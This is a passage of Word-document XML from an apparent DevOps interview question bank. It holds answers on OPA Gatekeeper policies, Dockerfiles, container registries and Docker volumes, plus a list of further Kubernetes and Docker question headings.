        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  crd:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      names:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kind: K8sRequiredLimits</w:t>
        <w:br/>
        <w:t xml:space="preserve">  targets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - target: admission.k8s.gatekeeper.sh</w:t>
        <w:br/>
        <w:t xml:space="preserve">      rego: |</w:t>
        <w:br/>
        <w:t xml:space="preserve">        package k8srequiredlimits</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">        violation[{"msg": msg}] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">          not input.request.object.spec.containers[_].resources.limits</w:t>
        <w:br/>
        <w:t xml:space="preserve">          msg := "CPU and memory limits are required"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Constraint</w:t>
        <w:br/>
        <w:t>apiVersion: constraints.gatekeeper.sh/v1beta1</w:t>
        <w:br/>
        <w:t>kind: K8sRequiredLimits</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: require-limits</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  match:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kinds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kinds: ["Pod"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens next</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * User tries to create a Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Gatekeeper evaluates policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If no resource limits → request is rejected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modes of operation</w:t>
        <w:br/>
        <w:t>1. Enforce mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Blocks non-compliant resources</w:t>
        <w:br/>
        <w:t>2. Audit mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reports violations but allows creation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Policy-as-code</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policies written in Rego (OPA language)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Version-controlled and reusable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Fine-grained control</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Namespace-level rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Label-based enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource-type specific policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Audit capability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Detect existing non-compliant resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Continuous compliance monitoring</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What OPA Gatekeeper enforces</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security rules (no privileged containers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Resource requirements (limits/requests mandatory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Image policies (trusted registries only)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Naming conventions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Label enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Namespace governance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes = office building</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Admission Controller = security guard at entrance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OPA Gatekeeper = smart compliance officer with a rulebook who checks every person and ensures company policies are followed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OPA Gatekeeper vs Admission Controllers</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Admission Controller</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OPA Gatekeeper</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited/custom code</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High (policy-as-code)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy language</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Go/webhooks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rego</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reusability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Audit support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium–High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Centralized policy management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strong security enforcement</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GitOps-friendly policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Auditable compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduces human error</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires learning Rego language</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Adds complexity to cluster setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can introduce latency in admission path</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging policies can be tricky</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise security compliance (SOC2, ISO 27001)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-tenant Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Regulated industries (finance, healthcare)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Standardizing DevOps practices across teams</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>OPA Gatekeeper is a policy enforcement framework for Kubernetes built on Open Policy Agent that uses admission webhooks and Rego-based policies to validate, mutate, or reject Kubernetes resources, enabling fine-grained, scalable, and auditable policy-as-code enforcement across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q314. What is Kyverno?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q315. Explain mutating webhooks.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q316. What is validating webhook?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q317. Explain API aggregation.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q318. What is kube-state-metrics?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q319. Explain metrics-server.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q320. What is kubectl exec?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q321. Explain ephemeral containers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q322. What is topology spread constraint?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q323. Explain multi-cluster Kubernetes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q324. What is kube-bench?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q325. Explain kube-hunter.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q326. What is Falco?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q327. Explain Kubernetes audit logs.</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Stackdriver,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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q328. What is service discovery?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q329. Explain DNS resolution in Kubernetes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q330. What is pod networking?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q331. Explain overlay networks.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q332. What is Calico?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q333. Explain Cilium.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q334. What are common Kubernetes failures?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q335. Design a highly available Kubernetes cluster.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Docker &amp; Containers (201–260)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q336. What is Docker?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q337. Explain containerization.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q338. Difference between VM and container?</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Q339. What is Docker Engine?</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Q340. What is Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Dockerfile?</w:t>
        <w:br/>
        <w:t>A Dockerfile is a text file that contains a set of instructions used to automatically build a Docker image.</w:t>
        <w:br/>
        <w:t>It defines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Base image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Startup commands</w:t>
        <w:br/>
        <w:t>Using a Dockerfile ensures consistent and repeatable image creation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Dockerfile</w:t>
        <w:br/>
        <w:t>FROM python:3.12</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>EXPOSE 5000</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Dockerfile Instructions</w:t>
        <w:br/>
        <w:t>Instruction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>FROM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Specifies the base image</w:t>
        <w:br/>
        <w:tab/>
        <w:t>WORKDIR</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sets the working directory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>COPY</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copies files from host to image</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ADD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copies files and supports URLs/tar extraction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RUN</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Executes commands during image build</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENV</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sets environment variables</w:t>
        <w:br/>
        <w:tab/>
        <w:t>EXPOSE</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Documents the port the container uses</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default command when container starts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main executable for the container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>USER</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Specifies the user to run commands</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ARG</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build-time variables</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Image Build Process</w:t>
        <w:br/>
        <w:t>Dockerfile</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Build Command</w:t>
        <w:br/>
        <w:t>docker build -t my-python-app:v1 .</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * -t → Tag the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * . → Current directory containing the Dockerfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD vs ENTRYPOINT</w:t>
        <w:br/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>Can be overridden:</w:t>
        <w:br/>
        <w:t>docker run image_name python test.py</w:t>
        <w:br/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["python"]</w:t>
        <w:br/>
        <w:t>CMD ["app.py"]</w:t>
        <w:br/>
        <w:t>Produces:</w:t>
        <w:br/>
        <w:t>python app.py</w:t>
        <w:br/>
        <w:t>If overridden:</w:t>
        <w:br/>
        <w:t>docker run image_name test.py</w:t>
        <w:br/>
        <w:t>Produces:</w:t>
        <w:br/>
        <w:t>python test.py</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Dockerfile Best Practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use lightweight base images (Alpine, Distroless).</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Minimize the number of layers.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use .dockerignore.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run containers as a non-root user.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pin image versions instead of using latest.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Leverage layer caching by copying dependency files first.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A Dockerfile is a declarative text file that contains instructions for building a Docker image. It defines the base image, application dependencies, configurations, and startup commands. Docker uses the Dockerfile during the docker build process to create immutable and reproducible images. Common instructions include FROM, COPY, RUN, ENV, CMD, and ENTRYPOINT. Following Dockerfile best practices such as using minimal base images, optimizing layer caching, and avoiding root users helps create secure and efficient container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q341. Explain Docker layers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q342. What is multi-stage build?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q343. Explain Docker Compose.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q344. What is Docker Hub?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q345. Explain image tagging.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q346. What is container registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Container Registry?</w:t>
        <w:br/>
        <w:t>A Container Registry is a centralized repository used to store, manage, version, and distribute container images.</w:t>
        <w:br/>
        <w:t>It acts as a library where container images are pushed and pulled by developers, CI/CD pipelines, and orchestration platforms like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need a Container Registry?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Store Docker/container images centrally</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Share images across teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version control images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secure image distribution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrate with CI/CD pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deploy images to Kubernetes and cloud platforms</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Container Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▲</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>CI/CD / Kubernetes / Servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Workflow</w:t>
        <w:br/>
        <w:t>Build Image</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v1 .</w:t>
        <w:br/>
        <w:t>Tag Image</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Push Image</w:t>
        <w:br/>
        <w:t>docker push myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Pull Image</w:t>
        <w:br/>
        <w:t>docker pull myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Run Container</w:t>
        <w:br/>
        <w:t>docker run myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Container Registries</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Hub</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon Elastic Container Registry (ECR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure Container Registry (ACR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Google Artifact Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Container Registry (GHCR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harbor</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Public vs Private Registry</w:t>
        <w:br/>
        <w:t>Public Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Accessible by everyone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restricted access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Suitable for open source</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Suitable for enterprises</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Examples: Docker Hub public repos</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ECR, ACR, Harbor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Versioning and tagging</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Access control (RBAC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image signing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Audit logging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Example</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>When the pod starts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Kubernetes asks the container runtime to pull the image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. The runtime downloads it from the registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. The container starts using that image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A container registry is a centralized service used to store, manage, and distribute container images. It enables developers and CI/CD pipelines to push versioned images and allows deployment platforms such as Kubernetes to pull and run them. Registries provide features such as image versioning, access control, vulnerability scanning, and lifecycle management. Common enterprise registries include Docker Hub, Amazon ECR, Azure Container Registry, Google Artifact Registry, and Harbor. In production environments, private registries are typically preferred for security and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q347. Explain private registries.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q348. What is OCI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q349. Explain container networking.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q350. What are bridge networks?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q351. Explain host networking.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q352. What is overlay networking?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q353. Explain Docker volumes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Docker Volumes?</w:t>
        <w:br/>
        <w:t>Docker Volumes are the preferred mechanism for persisting data generated and used by containers.</w:t>
        <w:br/>
        <w:t>Normally, when a container is deleted, all data stored in its writable layer is lost. Volumes allow data to survive container restarts, recreations, and upgrades.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need Volumes?</w:t>
        <w:br/>
        <w:t>Without a volume:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Database Data</w:t>
        <w:br/>
        <w:t>If the container is removed:</w:t>
        <w:br/>
        <w:t>docker rm mysql-container</w:t>
        <w:br/>
        <w:t>All data is lost.</w:t>
        <w:br/>
        <w:t>With a volume:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Persistent Storage</w:t>
        <w:br/>
        <w:t>Data remains even if the container is deleted.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Create a Volume</w:t>
        <w:br/>
        <w:t>docker volume create mysql-data</w:t>
        <w:br/>
        <w:t>List volumes:</w:t>
        <w:br/>
        <w:t>docker volume ls</w:t>
        <w:br/>
        <w:t>Inspect volume:</w:t>
        <w:br/>
        <w:t>docker volume inspect mysql-data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use a Volume</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
